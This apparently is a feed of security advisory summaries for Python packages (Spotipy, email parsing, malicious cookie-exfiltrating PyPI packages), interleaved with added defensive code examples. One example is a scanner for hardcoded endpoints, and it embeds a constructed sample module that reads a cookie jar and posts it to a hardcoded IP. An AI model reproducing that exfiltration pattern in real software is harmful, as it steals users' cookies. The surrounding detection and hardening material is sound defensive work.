[SECURITY] Fedora 41 Update: python-spotipy-2.25.1-1.fc41
A lightweight Python library for the Spotify Web API...
Linux Distros Unpatched Vulnerability: CVE-2024-23346
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Pymatgen Python Materials Genomics is an open-source Python library for materials analysis. A critical security vulnerability exists in the...
aether-observer (>=0.1.0 <=0.1.1), agloom (>=0.1.65 <=0.1.91) +83 more potentially affected by unknown CVE via kuzu (>=0.0.11 <=0.7.1)
kuzu PYPI version =0.0.11, =0.1.0, =0.1.65, =0.1.0, =0.3.0, =0.1.0, =4.3.12, =0.1.0, =0.2.0, =0.1.11, =0.1.1, =0.2.1, =0.1.3, =1.0.2, =1.0.3 - cognee-community-graph-adapter-spanner =0.1.0 and more Source cves: unknown CVE Source advisory: SNYK:PYTHON-KUZU-12179282...
CVE-2025-27154 Spotipy's cache file, containing spotify auth token, is created with overly broad permissions
Spotipy is a lightweight Python library for the Spotify Web API. The CacheHandler class creates a cache file to store the auth token. Prior to version 2.25.1, the file created has rw-r--r-- 644 permissions by default, when it could be locked down to rw------- 600 permissions. This leads to overly...
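The two behaviours described above, as an added example that is not Spotipy's own code: a cache created with a plain `open()` inherits `0o666 & ~umask` (0644 under the usual 022 umask), while `os.open` with an explicit mode of `0o600` makes the file owner-only from the instant it exists. The function names, the constructed token string and the audit helper are illustrative assumptions, not the library's API.

```python
import os
import stat
import tempfile

# Added example (not Spotipy's code): contrast a token cache created with
# default permissions against one created owner-only, and audit the result.


def write_cache_legacy(path: str, token_json: str) -> None:
    """Create the cache the way a plain open() does: mode 0o666 & ~umask,
    i.e. 0o644 under the common 022 umask, so group and others can read
    the bearer token."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(token_json)


def write_cache_private(path: str, token_json: str) -> None:
    """Create (or truncate) the cache with 0o600 at creation time, rather
    than creating it world-readable and chmod'ing afterwards."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(token_json)
    # O_CREAT's mode only applies to a newly created file; if the cache
    # already existed with looser bits, tighten it explicitly as well.
    os.chmod(path, 0o600)


def is_owner_only(path: str) -> bool:
    """Audit helper: True when no group/other permission bit is set."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return mode & 0o077 == 0


def default_create_mode() -> int:
    """Mode a plain open() gives a new file under the current umask."""
    current = os.umask(0)
    os.umask(current)
    return 0o666 & ~current


def demo() -> dict:
    # Constructed token payload; no real credential.
    token = '{"access_token": "constructed-example-token", "token_type": "Bearer"}'
    with tempfile.TemporaryDirectory() as d:
        legacy = os.path.join(d, ".cache-legacy")
        private = os.path.join(d, ".cache-private")
        write_cache_legacy(legacy, token)
        write_cache_private(private, token)
        return {
            "legacy_mode": stat.S_IMODE(os.stat(legacy).st_mode),
            "legacy_owner_only": is_owner_only(legacy),
            "private_mode": stat.S_IMODE(os.stat(private).st_mode),
            "private_owner_only": is_owner_only(private),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, oct(value) if isinstance(value, int) and not isinstance(value, bool) else value)
```

`is_owner_only` is the check to run against an existing `.cache` file written by an older version: a result of `False` means the stored token should be treated as exposed to every local user and rotated, not merely chmod'ed.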
CLSA-2025-1740645491 python3.11: Fix of CVE-2023-27043
CVE-2023-27043: add a strict parsing mode to prevent incorrect address interpretation. By default, strict=True is enabled. If you need the legacy behavior, explicitly set strict=False when calling parseaddr or getaddresses - Additionally, strict parsing can be disabled globally by setting the...
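Calling the patched parser explicitly, as an added example that is not part of the advisory: `email.utils.parseaddr(..., strict=True)` returns `('', '')` for the malformed inputs covered by CVE-2023-27043 (for instance `alice@example.org(<bob@example.org>`, where the legacy parser reports `alice@example.org` while a mail server may deliver to `bob@example.org`). Patched interpreters expose `email.utils.supports_strict_parsing`, which the example uses to detect the fix; the single-`@` fallback for unpatched interpreters is a conservative heuristic assumed here, not part of CPython.

```python
import email.utils

# Added example (not CPython's or the advisory's code): parse one sender
# header with the strict parser when available and fail closed otherwise.


def has_strict_parsing() -> bool:
    """Patched interpreters advertise the new keyword via this attribute."""
    return bool(getattr(email.utils, "supports_strict_parsing", False))


def parse_sender(header_value: str):
    """Return (display_name, addr_spec) for a single well-formed address,
    or None when the header must be rejected."""
    if has_strict_parsing():
        # strict=True is the default on patched interpreters; passing it
        # explicitly documents the intent and survives a global opt-out.
        name, addr = email.utils.parseaddr(header_value, strict=True)
    else:
        # Unpatched interpreter: the legacy parser may return the first
        # address of a crafted header. Assumed fallback heuristic: a single
        # sender address contains exactly one '@', so reject anything else.
        if header_value.count("@") != 1:
            return None
        name, addr = email.utils.parseaddr(header_value)
    if not addr:
        return None
    return name, addr


if __name__ == "__main__":
    # Constructed header values.
    for sample in (
        "Alice <alice@example.org>",
        "alice@example.org",
        "alice@example.org(<bob@example.org>",
        "alice@example.org]<bob@example.org>",
    ):
        print(repr(sample), "->", parse_sender(sample))
```

The parse results for well-formed headers are identical in both modes, so switching to `strict=True` only changes behaviour for inputs the legacy parser was already misreporting.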
PYSEC-2025-4 When using the project to bypass Deezer API restrictions, project exfiltrates user data to a hardcoded server.
Published in 2019, the automslc package is a Python library that bypasses Deezer API restrictions to download music. The package was found to exfiltrate user data to a hardcoded server, which could be used for malicious purposes...
PYSEC-2025-5 Exfiltrates user cookies to hardcoded server endpoint during normal operations
Published in 2020, the autodzee package is a Python library that bypasses Deezer API restrictions to download music. The package was found to exfiltrate user data to a hardcoded server, which could be used for malicious purposes...
PYSEC-2025-6 Exfiltrates cookies to hardcoded IP address
Published in 2021, the colabrun package is a Python library that exfiltrates user cookies to a hardcoded IP address. The package was found to exfiltrate user data to a hardcoded server, which could be used for malicious purposes...
PYSEC-2025-7 Posts scraped data to IP address associated with other malware distribution attacks.
Published in 2021, the imblog package is a Python library that scrapes data from a blog page to an IP address associated with other malware distribution attacks...
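The four PYSEC entries above share one pattern: a hardcoded server or IP literal plus an outbound HTTP call issued during normal operation. The following static triage pass over Python source is an added example, not the code of those packages or of the PYSEC project; it flags IPv4 and URL string literals and common network-send call names so a reviewer can inspect them. The sample module and the IP address in it (from the 203.0.113.0/24 documentation range) are constructed here.

```python
import ast
import re

# Added example (not the PYSEC project's or any listed package's code):
# flag hardcoded endpoints and outbound network calls in Python source.

IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
URL_RE = re.compile(r"^https?://([^/:\s]+)", re.IGNORECASE)
# Attribute names of common send primitives (requests, urllib, socket).
NETWORK_CALLS = {"post", "get", "put", "urlopen", "request", "connect", "sendall"}

# Constructed sample in the shape described by the advisories: reads a
# local cookie jar and posts it to an IP-literal host while also talking
# to a legitimate-looking API.
SAMPLE_MODULE = '''\
import os
import requests
from http.cookiejar import MozillaCookieJar

API = "https://api.deezer.com/"

def _collect():
    jar = MozillaCookieJar(os.path.expanduser("~/cookies.txt"))
    jar.load()
    return {c.name: c.value for c in jar}

def download(track_id):
    requests.post("http://203.0.113.10:8080/collect", data=_collect())
    return requests.get(API + "track/" + str(track_id)).json()
'''


def find_hardcoded_endpoints(source: str):
    """Return sorted (lineno, kind, value) findings: string literals that
    are IPv4 addresses or URLs (kind 'ip', 'url_ip_host' or 'url') and
    calls whose attribute name is a network-send primitive."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value.strip()
            if IPV4_RE.match(text):
                findings.append((node.lineno, "ip", text))
            else:
                m = URL_RE.match(text)
                if m:
                    kind = "url_ip_host" if IPV4_RE.match(m.group(1)) else "url"
                    findings.append((node.lineno, kind, text))
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            if node.func.attr in NETWORK_CALLS:
                findings.append((node.lineno, "network_call", ast.unparse(node.func)))
    return sorted(findings)


def ip_endpoints(source: str):
    """Strongest signal from the scan: endpoints addressed by IP literal
    rather than hostname, as in PYSEC-2025-6 and PYSEC-2025-7."""
    return [value for _, kind, value in find_hardcoded_endpoints(source)
            if kind in ("ip", "url_ip_host")]


if __name__ == "__main__":
    for lineno, kind, value in find_hardcoded_endpoints(SAMPLE_MODULE):
        print(f"line {lineno:>3}  {kind:<13} {value}")
```

The scan deliberately reports the legitimate API URL as well: a hardcoded URL is not evidence of malice on its own, so the output is a review worklist, with IP-literal hosts and send calls that sit next to cookie or credential reads at the top of it.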
PT-2025-8758 · Pypi · Imblog
Name of the Vulnerable Software and Affected Versions: The product name cannot be determined. Description: The issue concerns a Python library that scrapes data from a blog page to an IP address associated with other malware distribution attacks. Recommendations: At the moment, there is no...
PT-2025-8754 · Autodzee · Autodzee
Name of the Vulnerable Software and Affected Versions: autodzee affected versions not specified Description: The autodzee package, a Python library that bypasses Deezer API restrictions to download music, was found to exfiltrate user data to a hardcoded server. This could potentially be used for...
Malicious code in time-server-analysis (PyPI)
Source: kam193 5f796bcefeb9b8d3af4bde36c54545d77afdcd6b63284ae58b0a6078b0bbb561. This campaign is built from two parts: (1) packages named like time-check-server and snapshot-photo contain innocent-looking code that sends "date" to a remote...
MAL-2025-191704 Malicious code in computestpspeedcomp (PyPI)
Source: kam193 32f4586fefb791454cfa5a7bebbdd0372f4660b05989bfcd74a6f5aad48cb565. An infostealer with multiple capabilities, but not auto-activating on installation. There have already been multiple attempts to publish it, with different...
Pygwalker security vulnerability
Pygwalker is a Python library open-sourced by Kanaries that transforms data into a fully interactive visual exploration interface with a single line of code. A security vulnerability exists in Pygwalker prior to version 0.4.9.9, which originates from obtaining sensitive information and executin...
OPENSUSE-SU-2025:14739-1 python311-cryptography-44.0.0-1.1 on GA media
These are all security issues fixed in the python311-cryptography-44.0.0-1.1 package on the GA media of openSUSE Tumbleweed...